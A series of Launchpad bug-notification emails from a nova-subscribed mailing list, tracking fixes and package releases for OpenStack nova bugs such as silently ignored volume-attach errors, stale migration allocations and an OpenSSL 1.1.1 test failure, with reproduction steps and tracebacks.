** Changed in: cloud-archive/rocky Status: Fix Committed => Fix Released -- You received this bug notification because you are a member of Yahoo! Engineering Team, which is subscribed to OpenStack Compute (nova). https://bugs.launchpad.net/bugs/1826523 Title: libvirtError exceptions during volume attach leave volume connected to host Status in Ubuntu Cloud Archive: Fix Released Status in Ubuntu Cloud Archive queens series: Fix Released Status in Ubuntu Cloud Archive rocky series: Fix Released Status in Ubuntu Cloud Archive stein series: Fix Released Status in OpenStack Compute (nova): Fix Released Status in OpenStack Compute (nova) queens series: Fix Committed Status in OpenStack Compute (nova) rocky series: Fix Committed Status in OpenStack Compute (nova) stein series: Fix Committed Status in nova package in Ubuntu: Fix Released Status in nova source package in Bionic: Fix Released Status in nova source package in Cosmic: Fix Released Status in nova source package in Disco: Fix Released Bug description: [Impact] * This is an additional patch required for bug #1825882: when a libvirt exception prevents the volume attachment from completing, the underlying volumes should be disconnected from the host. [Test Case] * Deploy any OpenStack version up to Pike, which includes Ceph-backed cinder * Create a guest VM (openstack server ...) * Create a test cinder volume $ openstack volume create test --size 10 * Force a drop on ceph traffic. Run the following command on the nova hypervisor on which the server runs. $ iptables -A OUTPUT -d ceph-mon-addr -p tcp --dport 6800 -j DROP * Attach the volume to a running instance. $ openstack server add volume 7151f507-a6b7-4f6d-a4cc-fd223d9feb5d 742ff117-21ae-4d1b-a52b-5b37955716ff * This should cause the volume attachment to fail $ virsh domblklist instance-x Target Source vda nova/7151f507-a6b7-4f6d-a4cc-fd223d9feb5d_disk No volume should be attached after this step. 
* If the behavior is fixed: * Check that openstack server show does not display the volume as attached. * If the behavior isn't fixed: * openstack server show will display the volume in the volumes_attached property. [Expected result] * Volume attach fails and the volume is disconnected from the host. [Actual result] * Volume attach fails but the volume remains connected to the host. [Regression Potential] * The patches have been cherry-picked from upstream which helps to reduce the regression potential of these fixes. [Other Info] * N/A To manage notifications about this bug go to: https://bugs.launchpad.net/cloud-archive/+bug/1826523/+subscriptions
[Yahoo-eng-team] [Bug 1771506] Re: Unit test failure with OpenSSL 1.1.1
** Changed in: cloud-archive/rocky Status: Fix Committed => Fix Released ** Changed in: cloud-archive/stein Status: Fix Committed => Fix Released -- You received this bug notification because you are a member of Yahoo! Engineering Team, which is subscribed to OpenStack Compute (nova). https://bugs.launchpad.net/bugs/1771506 Title: Unit test failure with OpenSSL 1.1.1 Status in Ubuntu Cloud Archive: Fix Released Status in Ubuntu Cloud Archive queens series: Fix Released Status in Ubuntu Cloud Archive rocky series: Fix Released Status in Ubuntu Cloud Archive stein series: Fix Released Status in OpenStack Compute (nova): In Progress Status in nova package in Ubuntu: Fix Released Status in nova source package in Bionic: Fix Released Status in nova source package in Cosmic: Fix Released Status in nova source package in Disco: Fix Released Bug description: Hi, Building the Nova Queens package with OpenSSL 1.1.1 leads to unit test problems. This was reported to Debian at: https://bugs.debian.org/898807 The new openssl 1.1.1 is currently in experimental [0]. This package failed to build against this new package [1] while it built fine against the openssl version currently in unstable [2]. Could you please have a look? FAIL: nova.tests.unit.virt.xenapi.test_xenapi.XenAPIDiffieHellmanTestCase.test_encrypt_newlines_inside_message |nova.tests.unit.virt.xenapi.test_xenapi.XenAPIDiffieHellmanTestCase.test_encrypt_newlines_inside_message |-- |_StringException: pythonlogging:'': {{{2018-05-01 20:48:09,960 WARNING [oslo_config.cfg] Config option key_manager.api_class is deprecated. 
Use option key_manager.backend instead.}}} | |Traceback (most recent call last): | File "/<>/nova/tests/unit/virt/xenapi/test_xenapi.py", line 1592, in test_encrypt_newlines_inside_message |self._test_encryption('Message\nwith\ninterior\nnewlines.') | File "/<>/nova/tests/unit/virt/xenapi/test_xenapi.py", line 1577, in _test_encryption |enc = self.alice.encrypt(message) | File "/<>/nova/virt/xenapi/agent.py", line 432, in encrypt |return self._run_ssl(text).strip('\n') | File "/<>/nova/virt/xenapi/agent.py", line 428, in _run_ssl |raise RuntimeError(_('OpenSSL error: %s') % err) |RuntimeError: OpenSSL error: *** WARNING : deprecated key derivation used. |Using -iter or -pbkdf2 would be better. It looks like it is caused by an additional message on stderr. [0] https://lists.debian.org/msgid-search/20180501211400.ga21...@roeckx.be [1] https://breakpoint.cc/openssl-rebuild/2018-05-03-rebuild-openssl1.1.1-pre6/attempted/nova_17.0.0-4_amd64-2018-05-01T20%3A39%3A38Z [2] https://breakpoint.cc/openssl-rebuild/2018-05-03-rebuild-openssl1.1.1-pre6/successful/nova_17.0.0-4_amd64-2018-05-02T18%3A46%3A36Z To manage notifications about this bug go to: https://bugs.launchpad.net/cloud-archive/+bug/1771506/+subscriptions
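The traceback shows `_run_ssl` treating any stderr output as fatal, while OpenSSL 1.1.1 prints an informational warning to stderr even on success. A minimal sketch of the distinction a fix needs to draw (the function name and exact filtering are illustrative, not the nova patch itself):

```python
def ssl_error_from(returncode, stderr_text):
    """Return an error message only for genuine failures.

    OpenSSL 1.1.1 writes "*** WARNING : deprecated key derivation used."
    to stderr even when the enc operation succeeds, so stderr alone is
    not a reliable failure signal; the exit status is.
    """
    if returncode != 0:
        return 'OpenSSL error: %s' % stderr_text
    return None

# The new 1.1.1 warning on a successful run no longer raises:
warning = '*** WARNING : deprecated key derivation used.\n'
print(ssl_error_from(0, warning))            # None
# Real failures (non-zero exit) are still reported:
print(ssl_error_from(1, 'bad magic number'))  # OpenSSL error: bad magic number
```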
[Yahoo-eng-team] [Bug 1808951] Re: python3 + Fedora + SSL + wsgi nova deployment, nova api returns RecursionError: maximum recursion depth exceeded while calling a Python object
** Changed in: cloud-archive/stein Status: Fix Committed => Fix Released -- You received this bug notification because you are a member of Yahoo! Engineering Team, which is subscribed to OpenStack Compute (nova). https://bugs.launchpad.net/bugs/1808951 Title: python3 + Fedora + SSL + wsgi nova deployment, nova api returns RecursionError: maximum recursion depth exceeded while calling a Python object Status in Ubuntu Cloud Archive: Fix Released Status in Ubuntu Cloud Archive stein series: Fix Released Status in OpenStack Compute (nova): Fix Released Status in tripleo: Triaged Status in nova package in Ubuntu: Fix Released Status in nova source package in Disco: Fix Released Status in nova source package in Eoan: Fix Released Bug description: Description:- So while testing python3 with Fedora in [1], Found an issue while running nova-api behind wsgi. It fails with below Traceback:- 2018-12-18 07:41:55.364 26870 INFO nova.api.openstack.requestlog [req-e1af4808-ecd8-47c7-9568-a5dd9691c2c9 - - - - -] 127.0.0.1 "GET /v2.1/servers/detail?all_tenants=True&deleted=True" status: 500 len: 0 microversion: - time: 0.007297 2018-12-18 07:41:55.364 26870 ERROR nova.api.openstack [req-e1af4808-ecd8-47c7-9568-a5dd9691c2c9 - - - - -] Caught error: maximum recursion depth exceeded while calling a Python object: RecursionError: maximum recursion depth exceeded while calling a Python object 2018-12-18 07:41:55.364 26870 ERROR nova.api.openstack Traceback (most recent call last): 2018-12-18 07:41:55.364 26870 ERROR nova.api.openstack File "/usr/lib/python3.6/site-packages/nova/api/openstack/__init__.py", line 94, in __call__ 2018-12-18 07:41:55.364 26870 ERROR nova.api.openstack return req.get_response(self.application) 2018-12-18 07:41:55.364 26870 ERROR nova.api.openstack File "/usr/lib/python3.6/site-packages/webob/request.py", line 1313, in send 2018-12-18 07:41:55.364 26870 ERROR nova.api.openstack application, catch_exc_info=False) 2018-12-18 07:41:55.364 26870 ERROR 
nova.api.openstack File "/usr/lib/python3.6/site-packages/webob/request.py", line 1277, in call_application 2018-12-18 07:41:55.364 26870 ERROR nova.api.openstack app_iter = application(self.environ, start_response) 2018-12-18 07:41:55.364 26870 ERROR nova.api.openstack File "/usr/lib/python3.6/site-packages/webob/dec.py", line 129, in __call__ 2018-12-18 07:41:55.364 26870 ERROR nova.api.openstack resp = self.call_func(req, *args, **kw) 2018-12-18 07:41:55.364 26870 ERROR nova.api.openstack File "/usr/lib/python3.6/site-packages/webob/dec.py", line 193, in call_func 2018-12-18 07:41:55.364 26870 ERROR nova.api.openstack return self.func(req, *args, **kwargs) 2018-12-18 07:41:55.364 26870 ERROR nova.api.openstack File "/usr/lib/python3.6/site-packages/nova/api/openstack/requestlog.py", line 92, in __call__ 2018-12-18 07:41:55.364 26870 ERROR nova.api.openstack self._log_req(req, res, start) 2018-12-18 07:41:55.364 26870 ERROR nova.api.openstack File "/usr/lib/python3.6/site-packages/oslo_utils/excutils.py", line 220, in __exit__ 2018-12-18 07:41:55.364 26870 ERROR nova.api.openstack self.force_reraise() 2018-12-18 07:41:55.364 26870 ERROR nova.api.openstack File "/usr/lib/python3.6/site-packages/oslo_utils/excutils.py", line 196, in force_reraise 2018-12-18 07:41:55.364 26870 ERROR nova.api.openstack six.reraise(self.type_, self.value, self.tb) 2018-12-18 07:41:55.364 26870 ERROR nova.api.openstack File "/usr/lib/python3.6/site-packages/six.py", line 693, in reraise 2018-12-18 07:41:55.364 26870 ERROR nova.api.openstack raise value 2018-12-18 07:41:55.364 26870 ERROR nova.api.openstack File "/usr/lib/python3.6/site-packages/nova/api/openstack/requestlog.py", line 87, in __call__ 2018-12-18 07:41:55.364 26870 ERROR nova.api.openstack res = req.get_response(self.application) 2018-12-18 07:41:55.364 26870 ERROR nova.api.openstack File "/usr/lib/python3.6/site-packages/webob/request.py", line 1313, in send 2018-12-18 07:41:55.364 26870 ERROR nova.api.openstack 
application, catch_exc_info=False) 2018-12-18 07:41:55.364 26870 ERROR nova.api.openstack File "/usr/lib/python3.6/site-packages/webob/request.py", line 1277, in call_application 2018-12-18 07:41:55.364 26870 ERROR nova.api.openstack app_iter = application(self.environ, start_response) 2018-12-18 07:41:55.364 26870 ERROR nova.api.openstack File "/usr/lib/python3.6/site-packages/webob/dec.py", line 143, in __call__ 2018-12-18 07:41:55.364 26870 ERROR nova.api.openstack return resp(environ, start_response) 2018-12-18 07:41:55.364 26870 ERROR nova.api.openstack File "/usr/lib/python3.6/site-packages/webob/dec.py", line 129, in __call__ 2018-12-18 07:41:55.364 26870 ERROR nova.api.openstack resp = self.call_func(req, *args, **kw) 2018-12-18 07:41:55.364 26870 ERROR nova.api.openstack F
[Yahoo-eng-team] [Bug 1825882] Re: [SRU] Virsh disk attach errors silently ignored
** Changed in: cloud-archive/rocky Status: Fix Committed => Fix Released -- You received this bug notification because you are a member of Yahoo! Engineering Team, which is subscribed to OpenStack Compute (nova). https://bugs.launchpad.net/bugs/1825882 Title: [SRU] Virsh disk attach errors silently ignored Status in Ubuntu Cloud Archive: Fix Released Status in Ubuntu Cloud Archive queens series: Fix Released Status in Ubuntu Cloud Archive rocky series: Fix Released Status in Ubuntu Cloud Archive stein series: Fix Released Status in OpenStack Compute (nova): Fix Released Status in OpenStack Compute (nova) queens series: Fix Committed Status in OpenStack Compute (nova) rocky series: Fix Committed Status in OpenStack Compute (nova) stein series: Fix Committed Status in nova package in Ubuntu: Fix Released Status in nova source package in Bionic: Fix Released Status in nova source package in Cosmic: Fix Released Status in nova source package in Disco: Fix Released Bug description: [Impact] The following commit (1) causes volume attachments which fail due to libvirt device attach errors to be silently ignored, and Nova reports the attachment as successful. It seems that the original intention of the commit was to log a condition and re-raise the exception, but if the exception is of type libvirt.libvirtError and does not contain the searched pattern, the exception is ignored. If you unindent the raise statement, errors are reported again. In our case we had ceph/apparmor configuration problems in compute nodes which prevented virsh attaching the device; volumes appeared as successfully attached but the corresponding block device was missing in the guest VMs. Other libvirt attach error conditions are also ignored, such as already-occupied device names (e.g. 'Target vdb already exists', device busy, etc.) 
(1) https://github.com/openstack/nova/commit/78891c2305bff6e16706339a9c5eca99a84e409c [Test Case] * Deploy any OpenStack version up to Pike, which includes Ceph-backed cinder * Create a guest VM (openstack server ...) * Create a test cinder volume $ openstack volume create test --size 10 * Force a drop on ceph traffic. Run the following command on the nova hypervisor on which the server runs. $ iptables -A OUTPUT -d ceph-mon-addr -p tcp --dport 6800 -j DROP * Attach the volume to a running instance. $ openstack server add volume 7151f507-a6b7-4f6d-a4cc-fd223d9feb5d 742ff117-21ae-4d1b-a52b-5b37955716ff * This should cause the volume attachment to fail $ virsh domblklist instance-x Target Source vda nova/7151f507-a6b7-4f6d-a4cc-fd223d9feb5d_disk No volume should be attached after this step. * If the behavior is fixed: * Check that openstack server show does not display the volume as attached. * Check that proper log entries state the libvirt exception and error. * If the behavior isn't fixed: * openstack server show will display the volume in the volumes_attached property. [Expected result] * Volume attach fails and a proper exception is logged. [Actual result] * Volume attach fails but the volume remains connected to the host and no further exception gets logged. [Regression Potential] * The patches have been cherry-picked from upstream which helps to reduce the regression potential of these fixes. [Other Info] * N/A To manage notifications about this bug go to: https://bugs.launchpad.net/cloud-archive/+bug/1825882/+subscriptions
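The bug description pins the problem on a mis-indented `raise`: the exception is only re-raised when a specific message pattern matches. A stripped-down sketch of the two shapes (the exception class and the matched pattern are stand-ins for the libvirt originals, not nova's actual code):

```python
class LibvirtError(Exception):
    """Stand-in for libvirt.libvirtError."""

def attach_swallowing(dev_attach):
    # Buggy shape: the raise sits inside the pattern check, so any other
    # libvirtError ('Target vdb already exists', device busy, apparmor
    # denial, ...) is silently swallowed and the attach "succeeds".
    try:
        dev_attach()
    except LibvirtError as ex:
        if 'known pattern' in str(ex):
            raise

def attach_reraising(dev_attach):
    # Fixed shape: the pattern check still gates the special-case
    # logging, but the raise is unindented so every failure propagates.
    try:
        dev_attach()
    except LibvirtError as ex:
        if 'known pattern' in str(ex):
            pass  # special-case logging would go here
        raise

def failing_attach():
    raise LibvirtError('Requested operation is not valid: '
                       'target vdb already exists')

attach_swallowing(failing_attach)   # returns silently: the error is lost
try:
    attach_reraising(failing_attach)
except LibvirtError as ex:
    print('propagated:', ex)
```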
[Yahoo-eng-team] [Bug 1821594] Re: [SRU] Error in confirm_migration leaves stale allocations and 'confirming' migration state
This bug was fixed in the package nova - 2:18.2.0-0ubuntu2~cloud0 --- nova (2:18.2.0-0ubuntu2~cloud0) bionic-rocky; urgency=medium . * New upstream release for the Ubuntu Cloud Archive. . nova (2:18.2.0-0ubuntu2) cosmic; urgency=medium . * Cherry-picked from upstream to ensure no stale allocations are left over on failed cold migrations (LP: #1821594). - d/p/bug_1821594_1.patch: Fix migration record status - d/p/bug_1821594_2.patch: Delete failed allocation part 1 - d/p/bug_1821594_3.patch: Delete failed allocation part 2 - d/p/bug_1821594_4.patch: New functional test . nova (2:18.2.0-0ubuntu1) cosmic; urgency=medium . [Sahid Orentino Ferdjaoui] * New stable point release for OpenStack Rocky (LP: #1830695). * d/p/ensure-rbd-auth-fallback-uses-matching-credentials.patch: Dropped. Fixed upstream in 18.2.0. . [Corey Bryant] * d/p/skip-openssl-1.1.1-tests.patch: Dropped as this is now properly fixed by xenapi-agent-change-openssl-error-handling.patch. ** Changed in: cloud-archive/rocky Status: Fix Committed => Fix Released -- You received this bug notification because you are a member of Yahoo! Engineering Team, which is subscribed to OpenStack Compute (nova). 
https://bugs.launchpad.net/bugs/1821594 Title: [SRU] Error in confirm_migration leaves stale allocations and 'confirming' migration state Status in Ubuntu Cloud Archive: Triaged Status in Ubuntu Cloud Archive queens series: Triaged Status in Ubuntu Cloud Archive rocky series: Fix Released Status in Ubuntu Cloud Archive stein series: Triaged Status in Ubuntu Cloud Archive train series: Fix Committed Status in OpenStack Compute (nova): Fix Released Status in OpenStack Compute (nova) pike series: Triaged Status in OpenStack Compute (nova) queens series: Fix Committed Status in OpenStack Compute (nova) rocky series: Fix Committed Status in OpenStack Compute (nova) stein series: Fix Committed Status in nova package in Ubuntu: Fix Committed Status in nova source package in Bionic: Triaged Status in nova source package in Cosmic: Fix Released Status in nova source package in Disco: Triaged Status in nova source package in Eoan: Fix Committed Bug description: Description: When performing a cold migration, if an exception is raised by the driver during confirm_migration (this runs on the source node), the migration record is stuck in "confirming" state and the allocations against the source node are not removed. The instance is fine at the destination in this stage, but the source host has allocations that are not possible to clean without going to the database or invoking the Placement API via curl. After several migration attempts that fail in the same spot, the source node is filled with these allocations, which prevent new instances from being created or instances migrated to this node. When confirm_migration fails in this stage, the migrating instance can be saved through a hard reboot or a reset state to active. Steps to reproduce: Unfortunately, I don't have logs of the real root cause of the problem inside driver.confirm_migration running the libvirt driver.
However, the stale allocations and migration status problem can be easily reproduced by raising an exception in the libvirt driver's confirm_migration method, and it would affect any driver. Expected results: Discussed this issue with efried and mriedem over #openstack-nova on March 25th, 2019. They confirmed that allocations not being cleared up is a bug. Actual results: Instance is fine at the destination after a reset-state. Source node has stale allocations that prevent new instances from being created/migrated to the source node. Migration record is stuck in "confirming" state. Environment: I verified this bug on the pike, queens and stein branches, running the libvirt KVM driver. === [Impact] If users attempting to perform cold migrations face any issues when the virt driver is running the "Confirm Migration" step, the failure leaves stale allocation records in the database and migration records stuck in "confirming" state. The stale allocations are not cleaned up by nova, consuming the user's quota indefinitely. This bug was confirmed from the pike to stein releases, and a fix was implemented for queens, rocky and stein. It should be backported to those releases to prevent the issue from reoccurring. This fix prevents new stale allocations from being left over by cleaning them up immediately when the failures occur. At the moment, the users affected by this bug have to clean their previous stale allocations manually. [Test Case] 1. Reproducing the bug 1a. Inject failure The root cause for this problem may vary for each driver and environment, so to reproduce the bug, it is necessary first to inject a failure in t
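The failure injection that the (truncated) test case above calls for can be sketched as follows. This is purely illustrative: FakeDriver and the simplified method signature are hypothetical stand-ins for nova's virt driver interface, not its actual code.

```python
# Illustrative failure injection for reproducing the bug: make the virt
# driver's confirm_migration raise, as the reproduction steps suggest.
# FakeDriver and its simplified signature are hypothetical.

class FakeDriver:
    def confirm_migration(self, context, migration, instance, network_info):
        raise RuntimeError('injected failure in confirm_migration')
```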
[Yahoo-eng-team] [Bug 1771506] Re: Unit test failure with OpenSSL 1.1.1
** Changed in: cloud-archive/queens Status: Fix Committed => Fix Released -- You received this bug notification because you are a member of Yahoo! Engineering Team, which is subscribed to OpenStack Compute (nova). https://bugs.launchpad.net/bugs/1771506 Title: Unit test failure with OpenSSL 1.1.1 Status in Ubuntu Cloud Archive: Fix Committed Status in Ubuntu Cloud Archive queens series: Fix Released Status in Ubuntu Cloud Archive rocky series: Fix Committed Status in Ubuntu Cloud Archive stein series: Fix Committed Status in OpenStack Compute (nova): In Progress Status in nova package in Ubuntu: Fix Released Status in nova source package in Bionic: Fix Released Status in nova source package in Cosmic: Fix Released Status in nova source package in Disco: Fix Committed Bug description: Hi, Building the Nova Queens package with OpenSSL 1.1.1 leads to unit test problems. This was reported to Debian at: https://bugs.debian.org/898807 The new openssl 1.1.1 is currently in experimental [0]. This package failed to build against this new package [1] while it built fine against the openssl version currently in unstable [2]. Could you please have a look? FAIL: nova.tests.unit.virt.xenapi.test_xenapi.XenAPIDiffieHellmanTestCase.test_encrypt_newlines_inside_message |nova.tests.unit.virt.xenapi.test_xenapi.XenAPIDiffieHellmanTestCase.test_encrypt_newlines_inside_message |-- |_StringException: pythonlogging:'': {{{2018-05-01 20:48:09,960 WARNING [oslo_config.cfg] Config option key_manager.api_class is deprecated. 
Use option key_manager.backend instead.}}} | |Traceback (most recent call last): | File "/<>/nova/tests/unit/virt/xenapi/test_xenapi.py", line 1592, in test_encrypt_newlines_inside_message |self._test_encryption('Message\nwith\ninterior\nnewlines.') | File "/<>/nova/tests/unit/virt/xenapi/test_xenapi.py", line 1577, in _test_encryption |enc = self.alice.encrypt(message) | File "/<>/nova/virt/xenapi/agent.py", line 432, in encrypt |return self._run_ssl(text).strip('\n') | File "/<>/nova/virt/xenapi/agent.py", line 428, in _run_ssl |raise RuntimeError(_('OpenSSL error: %s') % err) |RuntimeError: OpenSSL error: *** WARNING : deprecated key derivation used. |Using -iter or -pbkdf2 would be better. It looks like this is due to an additional message on stderr. [0] https://lists.debian.org/msgid-search/20180501211400.ga21...@roeckx.be [1] https://breakpoint.cc/openssl-rebuild/2018-05-03-rebuild-openssl1.1.1-pre6/attempted/nova_17.0.0-4_amd64-2018-05-01T20%3A39%3A38Z [2] https://breakpoint.cc/openssl-rebuild/2018-05-03-rebuild-openssl1.1.1-pre6/successful/nova_17.0.0-4_amd64-2018-05-02T18%3A46%3A36Z To manage notifications about this bug go to: https://bugs.launchpad.net/cloud-archive/+bug/1771506/+subscriptions -- Mailing list: https://launchpad.net/~yahoo-eng-team Post to : yahoo-eng-team@lists.launchpad.net Unsubscribe : https://launchpad.net/~yahoo-eng-team More help : https://help.launchpad.net/ListHelp
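The traceback shows the failure mode: agent.py treats any stderr output from openssl as fatal, and OpenSSL 1.1.1 began emitting a key-derivation deprecation warning on stderr even on success. A hedged sketch of the two checks (function names are illustrative; the actual upstream fix landed as xenapi-agent-change-openssl-error-handling.patch and may differ in detail):

```python
# Sketch of the check that breaks under OpenSSL 1.1.1: treating any
# stderr text as an error (ssl_failed) versus stripping the known
# benign warning first (ssl_failed_tolerant). Names are illustrative.

DEPRECATION_WARNING = ('*** WARNING : deprecated key derivation used.\n'
                       'Using -iter or -pbkdf2 would be better.\n')

def ssl_failed(returncode, stderr):
    # pre-fix behaviour: any stderr output counts as failure
    return returncode != 0 or bool(stderr)

def ssl_failed_tolerant(returncode, stderr):
    # one possible fix: ignore the known benign warning text
    stderr = stderr.replace(DEPRECATION_WARNING, '')
    return returncode != 0 or bool(stderr.strip())
```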
[Yahoo-eng-team] [Bug 1826523] Re: libvirtError exceptions during volume attach leave volume connected to host
This bug was fixed in the package nova - 2:17.0.9-0ubuntu3~cloud0 --- nova (2:17.0.9-0ubuntu3~cloud0) xenial-queens; urgency=medium . * New update for the Ubuntu Cloud Archive. . nova (2:17.0.9-0ubuntu3) bionic; urgency=medium . * d/p/bug_1825882.patch: Cherry-picked from upstream to ensure virsh disk attach does not fail silently (LP: #1825882). * d/p/bug_1826523.patch: Cherry-picked from upstream to ensure volumes are always disconnected after libvirt exceptions (LP: #1826523). ** Changed in: cloud-archive/queens Status: Fix Committed => Fix Released -- You received this bug notification because you are a member of Yahoo! Engineering Team, which is subscribed to OpenStack Compute (nova). https://bugs.launchpad.net/bugs/1826523 Title: libvirtError exceptions during volume attach leave volume connected to host Status in Ubuntu Cloud Archive: Fix Released Status in Ubuntu Cloud Archive queens series: Fix Released Status in Ubuntu Cloud Archive rocky series: Fix Committed Status in Ubuntu Cloud Archive stein series: Fix Released Status in OpenStack Compute (nova): Fix Released Status in OpenStack Compute (nova) queens series: Fix Committed Status in OpenStack Compute (nova) rocky series: Fix Committed Status in OpenStack Compute (nova) stein series: Fix Committed Status in nova package in Ubuntu: Fix Released Status in nova source package in Bionic: Fix Released Status in nova source package in Cosmic: Fix Released Status in nova source package in Disco: Fix Committed Bug description: [Impact] * This is an additional patch required for bug #1825882: when a libvirt exception prevents the volume attachment from completing, the underlying volumes should be disconnected from the host. [Test Case] * Deploy any OpenStack version up to Pike, which includes ceph-backed cinder * Create a guest VM (openstack server ...) * Create a test cinder volume $ openstack volume create test --size 10 * Force a drop on ceph traffic.
Run the following command on the nova hypervisor on which the server runs. $ iptables -A OUTPUT -d ceph-mon-addr -p tcp --dport 6800 -j DROP * Attach the volume to a running instance. $ openstack server add volume 7151f507-a6b7-4f6d-a4cc-fd223d9feb5d 742ff117-21ae-4d1b-a52b-5b37955716ff * This should cause the volume attachment to fail $ virsh domblklist instance-x Target Source vda nova/7151f507-a6b7-4f6d-a4cc-fd223d9feb5d_disk No volume should be attached after this step. * If the behavior is fixed: * Check that openstack server show doesn't display the volume as attached. * If the behavior isn't fixed: * openstack server show will display the volume in the volumes_attached property. [Expected result] * Volume attach fails and the volume is disconnected from the host. [Actual result] * Volume attach fails but remains connected to the host. [Regression Potential] * The patches have been cherry-picked from upstream which helps to reduce the regression potential of these fixes. [Other Info] * N/A To manage notifications about this bug go to: https://bugs.launchpad.net/cloud-archive/+bug/1826523/+subscriptions -- Mailing list: https://launchpad.net/~yahoo-eng-team Post to : yahoo-eng-team@lists.launchpad.net Unsubscribe : https://launchpad.net/~yahoo-eng-team More help : https://help.launchpad.net/ListHelp
[Yahoo-eng-team] [Bug 1825882] Re: [SRU] Virsh disk attach errors silently ignored
This bug was fixed in the package nova - 2:19.0.0-0ubuntu2.3~cloud0 --- nova (2:19.0.0-0ubuntu2.3~cloud0) bionic-stein; urgency=medium . * New update for the Ubuntu Cloud Archive. . nova (2:19.0.0-0ubuntu2.3) disco; urgency=medium . * d/p/bug_1825882.patch: Cherry-picked from upstream to ensure virsh disk attach does not fail silently (LP: #1825882). * d/p/bug_1826523.patch: Cherry-picked from upstream to ensure volumes are always disconnected after libvirt exceptions (LP: #1826523). ** Changed in: cloud-archive/stein Status: Fix Committed => Fix Released -- You received this bug notification because you are a member of Yahoo! Engineering Team, which is subscribed to OpenStack Compute (nova). https://bugs.launchpad.net/bugs/1825882 Title: [SRU] Virsh disk attach errors silently ignored Status in Ubuntu Cloud Archive: Fix Released Status in Ubuntu Cloud Archive queens series: Fix Released Status in Ubuntu Cloud Archive rocky series: Fix Committed Status in Ubuntu Cloud Archive stein series: Fix Released Status in OpenStack Compute (nova): Fix Released Status in OpenStack Compute (nova) queens series: Fix Committed Status in OpenStack Compute (nova) rocky series: Fix Committed Status in OpenStack Compute (nova) stein series: Fix Committed Status in nova package in Ubuntu: Fix Released Status in nova source package in Bionic: Fix Released Status in nova source package in Cosmic: Fix Released Status in nova source package in Disco: Fix Committed Bug description: [Impact] The following commit (1) is causing volume attachments which fail due to libvirt device attach errors to be silently ignored, with Nova reporting the attachment as successful. It seems that the original intention of the commit was to log a condition and re-raise the exception, but if the exception is of type libvirt.libvirtError and does not contain the searched pattern, the exception is ignored. If you unindent the raise statement, errors are reported again.
In our case we had ceph/apparmor configuration problems on compute nodes which prevented virsh from attaching the device; volumes appeared as successfully attached but the corresponding block device was missing in guest VMs. Other libvirt attach error conditions are also ignored, e.g. already-occupied device names (i.e. 'Target vdb already exists', device is busy, etc.) (1) https://github.com/openstack/nova/commit/78891c2305bff6e16706339a9c5eca99a84e409c [Test Case] * Deploy any OpenStack version up to Pike, which includes ceph-backed cinder * Create a guest VM (openstack server ...) * Create a test cinder volume $ openstack volume create test --size 10 * Force a drop on ceph traffic. Run the following command on the nova hypervisor on which the server runs. $ iptables -A OUTPUT -d ceph-mon-addr -p tcp --dport 6800 -j DROP * Attach the volume to a running instance. $ openstack server add volume 7151f507-a6b7-4f6d-a4cc-fd223d9feb5d 742ff117-21ae-4d1b-a52b-5b37955716ff * This should cause the volume attachment to fail $ virsh domblklist instance-x Target Source vda nova/7151f507-a6b7-4f6d-a4cc-fd223d9feb5d_disk No volume should be attached after this step. * If the behavior is fixed: * Check that openstack server show doesn't display the volume as attached. * Check that proper log entries state the libvirt exception and error. * If the behavior isn't fixed: * openstack server show will display the volume in the volumes_attached property. [Expected result] * Volume attach fails and a proper exception is logged. [Actual result] * Volume attach fails but remains connected to the host and no further exception gets logged. [Regression Potential] * The patches have been cherry-picked from upstream which helps to reduce the regression potential of these fixes.
[Other Info] * N/A Description To manage notifications about this bug go to: https://bugs.launchpad.net/cloud-archive/+bug/1825882/+subscriptions -- Mailing list: https://launchpad.net/~yahoo-eng-team Post to : yahoo-eng-team@lists.launchpad.net Unsubscribe : https://launchpad.net/~yahoo-eng-team More help : https://help.launchpad.net/ListHelp
[Yahoo-eng-team] [Bug 1825882] Re: [SRU] Virsh disk attach errors silently ignored
This bug was fixed in the package nova - 2:17.0.9-0ubuntu3~cloud0 --- nova (2:17.0.9-0ubuntu3~cloud0) xenial-queens; urgency=medium . * New update for the Ubuntu Cloud Archive. . nova (2:17.0.9-0ubuntu3) bionic; urgency=medium . * d/p/bug_1825882.patch: Cherry-picked from upstream to ensure virsh disk attach does not fail silently (LP: #1825882). * d/p/bug_1826523.patch: Cherry-picked from upstream to ensure volumes are always disconnected after libvirt exceptions (LP: #1826523). ** Changed in: cloud-archive/queens Status: Fix Committed => Fix Released -- You received this bug notification because you are a member of Yahoo! Engineering Team, which is subscribed to OpenStack Compute (nova). https://bugs.launchpad.net/bugs/1825882 Title: [SRU] Virsh disk attach errors silently ignored Status in Ubuntu Cloud Archive: Fix Released Status in Ubuntu Cloud Archive queens series: Fix Released Status in Ubuntu Cloud Archive rocky series: Fix Committed Status in Ubuntu Cloud Archive stein series: Fix Released Status in OpenStack Compute (nova): Fix Released Status in OpenStack Compute (nova) queens series: Fix Committed Status in OpenStack Compute (nova) rocky series: Fix Committed Status in OpenStack Compute (nova) stein series: Fix Committed Status in nova package in Ubuntu: Fix Released Status in nova source package in Bionic: Fix Released Status in nova source package in Cosmic: Fix Released Status in nova source package in Disco: Fix Committed Bug description: [Impact] The following commit (1) is causing volume attachments which fail due to libvirt device attach errors to be silently ignored, with Nova reporting the attachment as successful. It seems that the original intention of the commit was to log a condition and re-raise the exception, but if the exception is of type libvirt.libvirtError and does not contain the searched pattern, the exception is ignored. If you unindent the raise statement, errors are reported again.
In our case we had ceph/apparmor configuration problems on compute nodes which prevented virsh from attaching the device; volumes appeared as successfully attached but the corresponding block device was missing in guest VMs. Other libvirt attach error conditions are also ignored, e.g. already-occupied device names (i.e. 'Target vdb already exists', device is busy, etc.) (1) https://github.com/openstack/nova/commit/78891c2305bff6e16706339a9c5eca99a84e409c [Test Case] * Deploy any OpenStack version up to Pike, which includes ceph-backed cinder * Create a guest VM (openstack server ...) * Create a test cinder volume $ openstack volume create test --size 10 * Force a drop on ceph traffic. Run the following command on the nova hypervisor on which the server runs. $ iptables -A OUTPUT -d ceph-mon-addr -p tcp --dport 6800 -j DROP * Attach the volume to a running instance. $ openstack server add volume 7151f507-a6b7-4f6d-a4cc-fd223d9feb5d 742ff117-21ae-4d1b-a52b-5b37955716ff * This should cause the volume attachment to fail $ virsh domblklist instance-x Target Source vda nova/7151f507-a6b7-4f6d-a4cc-fd223d9feb5d_disk No volume should be attached after this step. * If the behavior is fixed: * Check that openstack server show doesn't display the volume as attached. * Check that proper log entries state the libvirt exception and error. * If the behavior isn't fixed: * openstack server show will display the volume in the volumes_attached property. [Expected result] * Volume attach fails and a proper exception is logged. [Actual result] * Volume attach 